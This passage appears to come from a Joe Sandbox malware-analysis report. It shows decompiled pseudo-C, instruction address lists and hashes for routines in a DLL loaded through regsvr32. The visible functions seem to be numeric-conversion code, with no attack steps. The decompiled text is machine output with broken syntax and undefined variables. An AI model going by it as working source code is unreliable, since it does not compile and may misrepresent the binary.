					__eflags = r10d - 0x18;
					if(r10d <= 0x18) {
						__eflags = r10d;
						if(r10d == 0) {
							r8d = _t203;
							_t194 = _t203;
							goto L104;
						}
						L17:
						_t248 = _t247 - 1;
						__eflags =  *_t248;
						if( *_t248 != 0) {
							L20:
							_t12 =  &_a96; // 0x61
							_t13 =  &_a128; // 0x81
							E10052690(r10d, _t218, _t13, _t228, _t233, _t235, _t12, _t243, _t245, _t248);
							__eflags = r14d;
							if(r14d >= 0) {
								r8d = _a48;
							} else {
								r8d = _a48;
								r8d =  ~r8d;
							}
							r8d = r8d + _t181;
							__eflags = r12d;
							if(r12d == 0) {
								r8d = r8d + _a288;
								__eflags = r8d;
							}
							__eflags = r15d;
							if(r15d == 0) {
								r8d = r8d - _a296;
								__eflags = r8d;
							}
							__eflags = r8d - 0x1450;
							if(r8d > 0x1450) {
								_t194 = _t203;
								_t139 = 0x7fff;
								r8d = 0x80000000;
								_t203 = 2;
								_t183 = 0;
								goto L105;
							} else {
								__eflags = r8d - 0xffffebb0;
								if(r8d < 0xffffebb0) {
									r8d = _t203;
									_t194 = _t203;
									_t203 = 1;
									goto L104;
								}
								_t230 = 0x10070ac0;
								__eflags = r8d;
								if(r8d == 0) {
									L99:
									_t183 = _a96 & 0x0000ffff;
									_t194 = _a98;
									r8d = _a102;
									_t139 = _a104 >> 0x10;
									goto L105;
								}
								__eflags = r8d;
								if(r8d < 0) {
									r8d =  ~r8d;
									_t230 = 0x10070c20;
									__eflags = 0x10070c80;
								}
								__eflags = _a56;
								_t146 =  ==  ? 0 : _a96 & 0x0000ffff;
								__eflags = r8d;
								_a96 =  ==  ? 0 : _a96 & 0x0000ffff;
								if(r8d == 0) {
									_t203 = 0;
									__eflags = 0;
								} else {
									r9d = 0xffff8000;
									do {
										_t230 = _t230 + 0x54;
										r8d = r8d >> 3;
										__eflags = r8d & 0x00000007;
										_a48 = r8d;
										_a64 = _t230;
										if((r8d & 0x00000007) == 0) {
											goto L96;
										}
										_t225 = _t213 + _t213 * 2;
										__eflags =  *((short*)(_t230 + _t225 * 4)) - 0x8000;
										_t254 = _t230 + _t225 * 4;
										if( *((short*)(_t230 + _t225 * 4)) >= 0x8000) {
											_t29 =  &_a112; // 0x71
											_t225 = _t29;
											 *_t225 =  *_t254;
											_t177 = _t254[2];
											_t31 =  &_a112; // 0x71
											_t254 = _t31;
											 *(_t225 + 8) = _t177;
											_t213 = _a112 >> 0x10;
											_t178 = _t177 - 1;
											__eflags = _t178;
											_a114 = _t178;
										}
										_t184 = _t254[2] & 0x0000ffff;
										_t150 = _a106 & 0x0000ffff;
										r15d = 0;
										_t185 = _t184 & 0x00007fff;
										_a80 = 0;
										_t151 = _t150 & 0x00007fff;
										_a84 = 0;
										_t198 = (_t184 & 0x0000ffff ^ _t150) & 0x00008000;
										__eflags = _t151 - 0x7fff;
										_a88 = 0;
										_a56 = _t198;
										_t204 = _t213 + _t225;
										if(_t151 >= 0x7fff) {
											L95:
											__eflags = _t198;
											_t230 = _a64;
											_t153 =  !=  ? r9d : 0x7fff8000;
											_a100 = 0;
											_a96 = 0;
											_a104 =  !=  ? r9d : 0x7fff8000;
										} else {
											__eflags = _t185 - 0x7fff;
											if(_t185 >= 0x7fff) {
												goto L95;
											}
											__eflags = _t204 - 0xbffd;
											if(_t204 > 0xbffd) {
												goto L95;
											}
											__eflags = _t204 - 0x3fbf;
											if(_t204 > 0x3fbf) {
												__eflags = _t151;
												if(_t151 != 0) {
													L47:
													__eflags = _t185;
													if(_t185 != 0) {
														L52:
														r13d = 0;
														_t231 =  &_a84;
														r12d = 5;
														do {
															__eflags = r12d;
															_t182 = r12d;
															_t226 = _t251 + _t251;
															if(r12d <= 0) {
																goto L67;
															}
															_t59 =  &(_t254[2]); // 0x9
															_t246 = _t59;
															_t61 = _t226 + 0x60; // 0x65
															_t249 = _t238 + _t61;
															_t208 = r13d & 0x00000001;
															__eflags = _t208;
															do {
																_t187 = ( *_t249 & 0x0000ffff) * ( *_t246 & 0x0000ffff);
																__eflags = _t208;
																if(_t208 == 0) {
																	r8d = 0;
																	r9d = _t213 + _t226;
																	__eflags = r9d -  *(_t231 - 4);
																	if(r9d <  *(_t231 - 4)) {
																		L62:
																		r8d = 1;
																		L63:
																		 *(_t231 - 4) = r9d;
																		goto L64;
																	}
																	__eflags = r9d - _t187;
																	if(r9d >= _t187) {
																		goto L63;
																	}
																	goto L62;
																}
																r8d = 0;
																r9d = _t213 + _t226;
																__eflags = r9d -  *(_t231 - 4);
																if(r9d <  *(_t231 - 4)) {
																	L58:
																	r8d = 1;
																	L59:
																	 *(_t231 - 4) = r9d;
																	goto L64;
																}
																__eflags = r9d - _t187;
																if(r9d >= _t187) {
																	goto L59;
																}
																goto L58;
																L64:
																__eflags = r8d;
																if(r8d != 0) {
																	 *_t231 =  *_t231 + 1;
																	__eflags =  *_t231;
																}
																_t182 = _t182 - 1;
																_t249 =  &(_t249[1]);
																_t246 = _t246 - 2;
																__eflags = _t182;
															} while (_t182 > 0);
															L67:
															r12d = r12d - 1;
															_t231 =  &(_t231[0]);
															r13d = r13d + 1;
															__eflags = r12d;
														} while (r12d > 0);
														_t205 = _t204 + 0xc002;
														__eflags = _t205;
														if(__eflags <= 0) {
															r8d = _a88;
															_t199 = _a84;
															r9d = _a80;
															L82:
															_t205 = _t205 + 0xffff;
															__eflags = _t205;
															if(_t205 >= 0) {
																L74:
																_t155 = _a80 & 0x0000ffff;
																L75:
																__eflags = _t155 - 0x8000;
																if(_t155 > 0x8000) {
																	L77:
																	_t156 = _a82;
																	__eflags = _t156 - 0xffffffff;
																	if(_t156 != 0xffffffff) {
																		_t157 = _t156 + 1;
																		__eflags = _t157;
																		_a82 = _t157;
																		_t199 = _a84;
																	} else {
																		_t161 = _a86;
																		_a82 = 0;
																		__eflags = _t161 - 0xffffffff;
																		if(_t161 != 0xffffffff) {
																			_a86 = _t161 + 1;
																			r8d = _a88;
																			_t199 = _a84;
																		} else {
																			_t163 = _a90 & 0x0000ffff;
																			_a86 = 0;
																			__eflags = _t163 - 0xffff;
																			if(_t163 != 0xffff) {
																				_t199 = _a84;
																				_a90 = _t163 + 1;
																				r8d = _a88;
																			} else {
																				_t199 = _a84;
																				_a90 = 0x8000;
																				r8d = _a88;
																				_t205 = _t205 + 1;
																			}
																		}
																	}
																	L92:
																	__eflags = _t205 - 0x7fff;
																	if(_t205 < 0x7fff) {
																		_a98 = _t199;
																		_t230 = _a64;
																		_a102 = r8d;
																		r8d = _a48;
																		_a96 = _a82 & 0x0000ffff;
																		_a106 = _t205 | _a56;
																		r9d = 0xffff8000;
																	} else {
																		__eflags = _a56;
																		_t230 = _a64;
																		r8d = _a48;
																		r9d = 0xffff8000;
																		_a100 = 0;
																		_t160 =  !=  ? r9d : 0x7fff8000;
																		_a96 = 0;
																		_a104 =  !=  ? r9d : 0x7fff8000;
																	}
																	goto L96;
																}
																r9d = r9d & 0x0001ffff;
																__eflags = r9d - 0x18000;
																if(r9d != 0x18000) {
																	goto L92;
																}
																goto L77;
															}
															r10d =  ~(_t205 & 0x0000ffff) & 0x0000ffff;
															_t205 = _t205 + r10w;
															__eflags = _t205;
															do {
																__eflags = _a80 & 0x00000001;
																if((_a80 & 0x00000001) != 0) {
																	r15d = r15d + 1;
																	__eflags = r15d;
																}
																r9d = r9d >> 1;
																r9d = r9d | _t199 << 0x0000001f;
																r8d = r8d >> 1;
																_t199 = _t199 >> 0x00000001 | r8d << 0x0000001f;
																_t246 = _t246 - 1;
																__eflags = _t246;
																_a80 = r9d;
															} while (_t246 != 0);
															__eflags = r15d;
															_a84 = _t199;
															_a88 = r8d;
															if(r15d == 0) {
																goto L74;
															}
															_t155 = r9w | 0x00000001;
															_a80 = _t155;
															r9d = _a80;
															goto L75;
														}
														r8d = _a88;
														_t199 = _a84;
														r9d = _a80;
														while(1) {
															asm("inc ecx");
															if(__eflags < 0) {
																break;
															}
															r8d = r8d + r8d;
															_t191 = _t199 >> 0x1f;
															r9d = r9d + r9d;
															_t199 = _t199 + _t199 | r9d >> 0x0000001f;
															r8d = r8d | _t191;
															_t205 = _t205 + 0xffff;
															_a84 = _t199;
															_a88 = r8d;
															__eflags = _t205;
															_a80 = r9d;
															if(__eflags > 0) {
																continue;
															}
															goto L82;
														}
														__eflags = _t205;
														if(_t205 <= 0) {
															goto L82;
														}
														goto L74;
													}
													_t204 = _t204 + 1;
													asm("btr eax, 0x1f");
													__eflags = _t254[2];
													if(_t254[2] != 0) {
														goto L52;
													}
													__eflags = _t254[1];
													if(_t254[1] != 0) {
														goto L52;
													}
													__eflags =  *_t254;
													if( *_t254 != 0) {
														goto L52;
													}
													_t230 = _a64;
													_a104 = 0;
													_a100 = 0;
													_a96 = 0;
													goto L96;
												}
												_t204 = _t204 + 1;
												asm("btr eax, 0x1f");
												__eflags = _a104;
												if(_a104 != 0) {
													goto L47;
												}
												__eflags = _a100;
												if(_a100 != 0) {
													goto L47;
												}
												__eflags = _a96;
												if(_a96 != 0) {
													goto L47;
												}
												_t230 = _a64;
												_a106 = 0;
												goto L96;
											}
											_t230 = _a64;
											_a104 = 0;
											_a100 = 0;
											_a96 = 0;
										}
										L96:
										__eflags = r8d;
									} while (r8d != 0);
									_t203 = 0;
								}
								goto L99;
							}
						}
						do {
							_t248 = _t248 - 1;
							r10d = r10d + 0xffffffff;
							_t181 = _t181 + 1;
							__eflags =  *_t248;
						} while ( *_t248 == 0);
						goto L20;
					}
					_t179 = _a151 & 0x000000ff;
					__eflags = _t179 - 5;
					if(_t179 >= 5) {
						_t180 = _t179 + 1;
						__eflags = _t180;
						_a151 = _t180;
					}
					_t247 = _t247 - 1;
					r10d = 0x18;
					_t181 = _t181 + 1;
					goto L17;
				}
				L1:
				_t240 = _t240 + 1;
				if(r9d <= 0xb) {
					_t213 = 0x10000000;
					goto __rcx;
				}
				__eflags = r9d - 0xa;
			}



















































                                                                              0x1004ee1d
                                                                              0x1004ee1d
                                                                              0x1004ee1d
                                                                              0x1004ee1d
                                                                              0x1004ee1d
                                                                              0x1004ee1d
                                                                              0x1004ee22
                                                                              0x1004ee44
                                                                              0x1004ee47
                                                                              0x1004ee49
                                                                              0x1004ee5d
                                                                              0x1004ee60
                                                                              0x1004f16b
                                                                              0x1004f16e
                                                                              0x00000000
                                                                              0x1004f16e
                                                                              0x1004ee66
                                                                              0x00000000
                                                                              0x1004ee6c
                                                                              0x1004ee4b
                                                                              0x1004ee24
                                                                              0x1004ee24
                                                                              0x1004ee2a
                                                                              0x1004ecc0
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f11d
                                                                              0x1004f11d
                                                                              0x1004f11f
                                                                              0x1004f11f
                                                                              0x1004f121
                                                                              0x1004f125
                                                                              0x1004f706
                                                                              0x1004f709
                                                                              0x1004f70b
                                                                              0x1004f710
                                                                              0x1004f710
                                                                              0x1004f713
                                                                              0x1004f713
                                                                              0x1004f716
                                                                              0x1004f716
                                                                              0x1004f71b
                                                                              0x1004f71b
                                                                              0x1004f720
                                                                              0x1004f727
                                                                              0x1004f72b
                                                                              0x1004f72f
                                                                              0x1004f77b
                                                                              0x1004f78a
                                                                              0x1004f78a
                                                                              0x1004f12b
                                                                              0x1004f12f
                                                                              0x1004f20f
                                                                              0x1004f212
                                                                              0x1004f6ff
                                                                              0x1004f702
                                                                              0x00000000
                                                                              0x1004f702
                                                                              0x1004f218
                                                                              0x1004f218
                                                                              0x1004f21c
                                                                              0x1004f220
                                                                              0x1004f241
                                                                              0x1004f241
                                                                              0x1004f246
                                                                              0x1004f251
                                                                              0x1004f256
                                                                              0x1004f259
                                                                              0x1004f265
                                                                              0x1004f25b
                                                                              0x1004f25b
                                                                              0x1004f260
                                                                              0x1004f260
                                                                              0x1004f26a
                                                                              0x1004f26d
                                                                              0x1004f270
                                                                              0x1004f272
                                                                              0x1004f272
                                                                              0x1004f272
                                                                              0x1004f27a
                                                                              0x1004f27d
                                                                              0x1004f27f
                                                                              0x1004f27f
                                                                              0x1004f27f
                                                                              0x1004f287
                                                                              0x1004f28e
                                                                              0x1004f6e9
                                                                              0x1004f6eb
                                                                              0x1004f6ef
                                                                              0x1004f6f5
                                                                              0x1004f6fa
                                                                              0x00000000
                                                                              0x1004f294
                                                                              0x1004f294
                                                                              0x1004f29b
                                                                              0x1004f6dd
                                                                              0x1004f6e0
                                                                              0x1004f6e2
                                                                              0x00000000
                                                                              0x1004f6e2
                                                                              0x1004f2a8
                                                                              0x1004f2ac
                                                                              0x1004f2af
                                                                              0x1004f6c6
                                                                              0x1004f6ca
                                                                              0x1004f6cf
                                                                              0x1004f6d3
                                                                              0x1004f6d8
                                                                              0x00000000
                                                                              0x1004f6d8
                                                                              0x1004f2b5
                                                                              0x1004f2b8
                                                                              0x1004f2c1
                                                                              0x1004f2c4
                                                                              0x1004f2c4
                                                                              0x1004f2c4
                                                                              0x1004f2cd
                                                                              0x1004f2d7
                                                                              0x1004f2db
                                                                              0x1004f2de
                                                                              0x1004f2e3
                                                                              0x1004f6c4
                                                                              0x1004f6c4
                                                                              0x1004f2e9
                                                                              0x1004f2e9
                                                                              0x1004f2f0
                                                                              0x1004f2f3
                                                                              0x1004f2f7
                                                                              0x1004f2fb
                                                                              0x1004f2fe
                                                                              0x1004f303
                                                                              0x1004f308
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f310
                                                                              0x1004f314
                                                                              0x1004f31a
                                                                              0x1004f31e
                                                                              0x1004f323
                                                                              0x1004f323
                                                                              0x1004f328
                                                                              0x1004f32b
                                                                              0x1004f32f
                                                                              0x1004f32f
                                                                              0x1004f334
                                                                              0x1004f33c
                                                                              0x1004f340
                                                                              0x1004f340
                                                                              0x1004f343
                                                                              0x1004f343
                                                                              0x1004f347
                                                                              0x1004f34c
                                                                              0x1004f351
                                                                              0x1004f357
                                                                              0x1004f35c
                                                                              0x1004f363
                                                                              0x1004f367
                                                                              0x1004f36b
                                                                              0x1004f370
                                                                              0x1004f374
                                                                              0x1004f378
                                                                              0x1004f37d
                                                                              0x1004f380
                                                                              0x1004f69a
                                                                              0x1004f69a
                                                                              0x1004f69d
                                                                              0x1004f6a7
                                                                              0x1004f6ab
                                                                              0x1004f6af
                                                                              0x1004f6b3
                                                                              0x1004f386
                                                                              0x1004f386
                                                                              0x1004f38b
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f391
                                                                              0x1004f396
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f39c
                                                                              0x1004f3a1
                                                                              0x1004f3b9
                                                                              0x1004f3bc
                                                                              0x1004f3e9
                                                                              0x1004f3e9
                                                                              0x1004f3ec
                                                                              0x1004f41f
                                                                              0x1004f41f
                                                                              0x1004f422
                                                                              0x1004f427
                                                                              0x1004f430
                                                                              0x1004f430
                                                                              0x1004f438
                                                                              0x1004f43b
                                                                              0x1004f43e
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f443
                                                                              0x1004f443
                                                                              0x1004f447
                                                                              0x1004f447
                                                                              0x1004f44c
                                                                              0x1004f44c
                                                                              0x1004f450
                                                                              0x1004f458
                                                                              0x1004f45b
                                                                              0x1004f45d
                                                                              0x1004f482
                                                                              0x1004f485
                                                                              0x1004f489
                                                                              0x1004f48c
                                                                              0x1004f493
                                                                              0x1004f493
                                                                              0x1004f499
                                                                              0x1004f499
                                                                              0x00000000
                                                                              0x1004f499
                                                                              0x1004f48e
                                                                              0x1004f491
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f491
                                                                              0x1004f462
                                                                              0x1004f465
                                                                              0x1004f469
                                                                              0x1004f46c
                                                                              0x1004f473
                                                                              0x1004f473
                                                                              0x1004f479
                                                                              0x1004f479
                                                                              0x00000000
                                                                              0x1004f479
                                                                              0x1004f46e
                                                                              0x1004f471
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f49d
                                                                              0x1004f49d
                                                                              0x1004f4a0
                                                                              0x1004f4a2
                                                                              0x1004f4a2
                                                                              0x1004f4a2
                                                                              0x1004f4a6
                                                                              0x1004f4a9
                                                                              0x1004f4ad
                                                                              0x1004f4b1
                                                                              0x1004f4b1
                                                                              0x1004f4b5
                                                                              0x1004f4b5
                                                                              0x1004f4b9
                                                                              0x1004f4bd
                                                                              0x1004f4c1
                                                                              0x1004f4c1
                                                                              0x1004f4ca
                                                                              0x1004f4cf
                                                                              0x1004f4d2
                                                                              0x1004f58d
                                                                              0x1004f592
                                                                              0x1004f596
                                                                              0x1004f59b
                                                                              0x1004f59b
                                                                              0x1004f59b
                                                                              0x1004f5a0
                                                                              0x1004f524
                                                                              0x1004f524
                                                                              0x1004f529
                                                                              0x1004f529
                                                                              0x1004f52d
                                                                              0x1004f543
                                                                              0x1004f543
                                                                              0x1004f547
                                                                              0x1004f54a
                                                                              0x1004f62d
                                                                              0x1004f62d
                                                                              0x1004f630
                                                                              0x1004f634
                                                                              0x1004f550
                                                                              0x1004f550
                                                                              0x1004f554
                                                                              0x1004f558
                                                                              0x1004f55b
                                                                              0x1004f61e
                                                                              0x1004f622
                                                                              0x1004f627
                                                                              0x1004f561
                                                                              0x1004f561
                                                                              0x1004f566
                                                                              0x1004f56a
                                                                              0x1004f56e
                                                                              0x1004f607
                                                                              0x1004f60f
                                                                              0x1004f614
                                                                              0x1004f574
                                                                              0x1004f574
                                                                              0x1004f578
                                                                              0x1004f57f
                                                                              0x1004f584
                                                                              0x1004f584
                                                                              0x1004f56e
                                                                              0x1004f55b
                                                                              0x1004f638
                                                                              0x1004f638
                                                                              0x1004f63d
                                                                              0x1004f675
                                                                              0x1004f679
                                                                              0x1004f67e
                                                                              0x1004f683
                                                                              0x1004f688
                                                                              0x1004f68d
                                                                              0x1004f692
                                                                              0x1004f63f
                                                                              0x1004f63f
                                                                              0x1004f644
                                                                              0x1004f649
                                                                              0x1004f653
                                                                              0x1004f659
                                                                              0x1004f65d
                                                                              0x1004f661
                                                                              0x1004f665
                                                                              0x1004f665
                                                                              0x00000000
                                                                              0x1004f63d
                                                                              0x1004f52f
                                                                              0x1004f536
                                                                              0x1004f53d
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f53d
                                                                              0x1004f5a8
                                                                              0x1004f5ac
                                                                              0x1004f5ac
                                                                              0x1004f5b0
                                                                              0x1004f5b0
                                                                              0x1004f5b5
                                                                              0x1004f5b7
                                                                              0x1004f5b7
                                                                              0x1004f5b7
                                                                              0x1004f5c0
                                                                              0x1004f5cb
                                                                              0x1004f5ce
                                                                              0x1004f5d1
                                                                              0x1004f5d3
                                                                              0x1004f5d3
                                                                              0x1004f5d7
                                                                              0x1004f5d7
                                                                              0x1004f5de
                                                                              0x1004f5e1
                                                                              0x1004f5e5
                                                                              0x1004f5ea
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f5f4
                                                                              0x1004f5f8
                                                                              0x1004f5fd
                                                                              0x00000000
                                                                              0x1004f5fd
                                                                              0x1004f4d8
                                                                              0x1004f4dd
                                                                              0x1004f4e1
                                                                              0x1004f4e6
                                                                              0x1004f4e6
                                                                              0x1004f4eb
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f4f2
                                                                              0x1004f4fa
                                                                              0x1004f4fd
                                                                              0x1004f500
                                                                              0x1004f502
                                                                              0x1004f505
                                                                              0x1004f50a
                                                                              0x1004f50e
                                                                              0x1004f513
                                                                              0x1004f516
                                                                              0x1004f51b
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f51d
                                                                              0x1004f51f
                                                                              0x1004f522
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f522
                                                                              0x1004f3f2
                                                                              0x1004f3f6
                                                                              0x1004f3fa
                                                                              0x1004f3fc
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f3fe
                                                                              0x1004f402
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f404
                                                                              0x1004f407
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f409
                                                                              0x1004f40e
                                                                              0x1004f412
                                                                              0x1004f416
                                                                              0x00000000
                                                                              0x1004f416
                                                                              0x1004f3c2
                                                                              0x1004f3c6
                                                                              0x1004f3ca
                                                                              0x1004f3cc
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f3ce
                                                                              0x1004f3d2
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f3d4
                                                                              0x1004f3d8
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004f3da
                                                                              0x1004f3df
                                                                              0x00000000
                                                                              0x1004f3df
                                                                              0x1004f3a3
                                                                              0x1004f3a8
                                                                              0x1004f3ac
                                                                              0x1004f3b0
                                                                              0x1004f3b0
                                                                              0x1004f6b7
                                                                              0x1004f6b7
                                                                              0x1004f6b7
                                                                              0x1004f6c0
                                                                              0x1004f6c0
                                                                              0x00000000
                                                                              0x1004f2e3
                                                                              0x1004f28e
                                                                              0x1004f230
                                                                              0x1004f230
                                                                              0x1004f234
                                                                              0x1004f238
                                                                              0x1004f23b
                                                                              0x1004f23b
                                                                              0x00000000
                                                                              0x1004f230
                                                                              0x1004f135
                                                                              0x1004f13d
                                                                              0x1004f13f
                                                                              0x1004f141
                                                                              0x1004f141
                                                                              0x1004f143
                                                                              0x1004f143
                                                                              0x1004f14a
                                                                              0x1004f14e
                                                                              0x1004f154
                                                                              0x00000000
                                                                              0x1004f154
                                                                              0x1004ecc0
                                                                              0x1004ecc4
                                                                              0x1004eccc
                                                                              0x1004ecdc
                                                                              0x1004ece6
                                                                              0x1004ece6
                                                                              0x1004f113

                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: c6b74dc810445f3513b21d80d7b6d42ce4e03ec7d1a61872aaa41793bdf43902
                                                                              • Instruction ID: f321e9cba3c5cb2abac2f13816add198d6537639ffcd5d1616a8fad1679989cb
                                                                              • Opcode Fuzzy Hash: c6b74dc810445f3513b21d80d7b6d42ce4e03ec7d1a61872aaa41793bdf43902
                                                                              • Instruction Fuzzy Hash: 2A61F5776287C4C6D761CF26E0447AEB7A1F395780FA1412AEA89C3B58DB79D441CF08
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 1004F04C Relevance: .2, Instructions: 162COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 89%
                                                                              			E1004F04C(void* __ebx, intOrPtr __edx, signed int __ebp, intOrPtr* __r8, void* __r11, void* __r12, long long* __r13, signed int _a48, signed int _a52, signed int _a56, long long _a64, signed int* _a72, unsigned int _a80, signed short _a82, signed int _a84, signed int _a86, signed int _a88, signed int _a90, signed int _a96, signed int _a98, signed int _a100, signed int _a102, unsigned int _a104, signed int _a106, unsigned int _a112, signed int _a114, char _a128, signed int _a151, signed int _a160, void* _a184, void* _a192, void* _a200, void* _a208, void* _a216, void* _a224, void* _a232, void* _a240, intOrPtr _a288, intOrPtr _a296) {
				unsigned int _t134;
				signed int _t135;
				signed short _t145;
				signed short _t146;
				signed short _t150;
				signed short _t151;
				signed int _t152;
				signed int _t156;
				signed int _t158;
				signed int _t172;
				signed int _t173;
				signed int _t174;
				signed char _t175;
				void* _t176;
				signed int _t177;
				signed int _t178;
				signed short _t179;
				signed short _t180;
				signed int _t182;
				signed int _t186;
				intOrPtr _t188;
				signed int _t190;
				signed short _t194;
				signed int _t195;
				signed int _t199;
				void* _t200;
				signed int _t201;
				signed int _t204;
				signed int _t205;
				void* _t215;
				signed long long _t221;
				void* _t222;
				void* _t224;
				long long _t226;
				signed int* _t227;
				void* _t229;
				void* _t231;
				signed long long _t234;
				intOrPtr* _t236;
				long long _t237;
				void* _t239;
				signed int* _t240;
				void* _t241;
				signed int _t242;
				void* _t243;
				char* _t244;
				signed short* _t245;
				void* _t246;
				long long* _t248;
				signed int* _t251;

				_t248 = __r13;
				_t246 = __r12;
				_t243 = __r11;
				_t236 = __r8;
				_t205 = __ebp;
				_t188 = __edx;
				_t176 = __ebx;
				r12d = 1;
				if(__edx != 0x30) {
					L5:
					if(_t188 - 0x31 > 8) {
						_t237 = _t236 - _t246;
						_t199 = 0;
						L9:
						__eflags = _t205;
						 *_t248 = _t237;
						if(_t205 == 0) {
							r8d = _t199;
							_t190 = _t199;
							_t199 = 4;
							L103:
							_t178 = 0;
							_t134 = 0;
							__eflags = 0;
							L104:
							_t240 = _a72;
							_t135 = _t134 | _a52;
							__eflags = _t135;
							_t240[2] = _t135;
							 *_t240 = _t178;
							_t240[0] = _t190;
							_t240[1] = r8d;
							__eflags = _a160 ^ _t234;
							return E10038D20(_t178, _a160 ^ _t234);
						}
						__eflags = r10d - 0x18;
						if(r10d <= 0x18) {
							__eflags = r10d;
							if(r10d == 0) {
								r8d = _t199;
								_t190 = _t199;
								goto L103;
							}
							L16:
							_t244 = _t243 - 1;
							__eflags =  *_t244;
							if( *_t244 != 0) {
								L19:
								_t8 =  &_a96; // 0x61
								_t9 =  &_a128; // 0x81
								E10052690(r10d, _t215, _t9, _t224, _t229, _t231, _t8, _t239, _t241, _t244);
								__eflags = r14d;
								if(r14d >= 0) {
									r8d = _a48;
								} else {
									r8d = _a48;
									r8d =  ~r8d;
								}
								r8d = r8d + _t176;
								__eflags = r12d;
								if(r12d == 0) {
									r8d = r8d + _a288;
									__eflags = r8d;
								}
								__eflags = r15d;
								if(r15d == 0) {
									r8d = r8d - _a296;
									__eflags = r8d;
								}
								__eflags = r8d - 0x1450;
								if(r8d > 0x1450) {
									_t190 = _t199;
									_t134 = 0x7fff;
									r8d = 0x80000000;
									_t199 = 2;
									_t178 = 0;
									goto L104;
								} else {
									__eflags = r8d - 0xffffebb0;
									if(r8d < 0xffffebb0) {
										r8d = _t199;
										_t190 = _t199;
										_t199 = 1;
										goto L103;
									}
									_t226 = 0x10070ac0;
									__eflags = r8d;
									if(r8d == 0) {
										L98:
										_t178 = _a96 & 0x0000ffff;
										_t190 = _a98;
										r8d = _a102;
										_t134 = _a104 >> 0x10;
										goto L104;
									}
									__eflags = r8d;
									if(r8d < 0) {
										r8d =  ~r8d;
										_t226 = 0x10070c20;
										__eflags = 0x10070c80;
									}
									__eflags = _a56;
									_t141 =  ==  ? 0 : _a96 & 0x0000ffff;
									__eflags = r8d;
									_a96 =  ==  ? 0 : _a96 & 0x0000ffff;
									if(r8d == 0) {
										_t199 = 0;
										__eflags = 0;
									} else {
										r9d = 0xffff8000;
										do {
											_t226 = _t226 + 0x54;
											r8d = r8d >> 3;
											__eflags = r8d & 0x00000007;
											_a48 = r8d;
											_a64 = _t226;
											if((r8d & 0x00000007) == 0) {
												goto L95;
											}
											_t221 = _t211 + _t211 * 2;
											__eflags =  *((short*)(_t226 + _t221 * 4)) - 0x8000;
											_t251 = _t226 + _t221 * 4;
											if( *((short*)(_t226 + _t221 * 4)) >= 0x8000) {
												_t25 =  &_a112; // 0x71
												_t221 = _t25;
												 *_t221 =  *_t251;
												_t172 = _t251[2];
												_t27 =  &_a112; // 0x71
												_t251 = _t27;
												 *(_t221 + 8) = _t172;
												_t211 = _a112 >> 0x10;
												_t173 = _t172 - 1;
												__eflags = _t173;
												_a114 = _t173;
											}
											_t179 = _t251[2] & 0x0000ffff;
											_t145 = _a106 & 0x0000ffff;
											r15d = 0;
											_t180 = _t179 & 0x00007fff;
											_a80 = 0;
											_t146 = _t145 & 0x00007fff;
											_a84 = 0;
											_t194 = (_t179 & 0x0000ffff ^ _t145) & 0x00008000;
											__eflags = _t146 - 0x7fff;
											_a88 = 0;
											_a56 = _t194;
											_t200 = _t211 + _t221;
											if(_t146 >= 0x7fff) {
												L94:
												__eflags = _t194;
												_t226 = _a64;
												_t148 =  !=  ? r9d : 0x7fff8000;
												_a100 = 0;
												_a96 = 0;
												_a104 =  !=  ? r9d : 0x7fff8000;
											} else {
												__eflags = _t180 - 0x7fff;
												if(_t180 >= 0x7fff) {
													goto L94;
												}
												__eflags = _t200 - 0xbffd;
												if(_t200 > 0xbffd) {
													goto L94;
												}
												__eflags = _t200 - 0x3fbf;
												if(_t200 > 0x3fbf) {
													__eflags = _t146;
													if(_t146 != 0) {
														L46:
														__eflags = _t180;
														if(_t180 != 0) {
															L51:
															r13d = 0;
															_t227 =  &_a84;
															r12d = 5;
															do {
																__eflags = r12d;
																_t177 = r12d;
																_t222 = _t248 + _t248;
																if(r12d <= 0) {
																	goto L66;
																}
																_t55 =  &(_t251[2]); // 0x9
																_t242 = _t55;
																_t57 = _t222 + 0x60; // 0x65
																_t245 = _t234 + _t57;
																_t204 = r13d & 0x00000001;
																__eflags = _t204;
																do {
																	_t182 = ( *_t245 & 0x0000ffff) * ( *_t242 & 0x0000ffff);
																	__eflags = _t204;
																	if(_t204 == 0) {
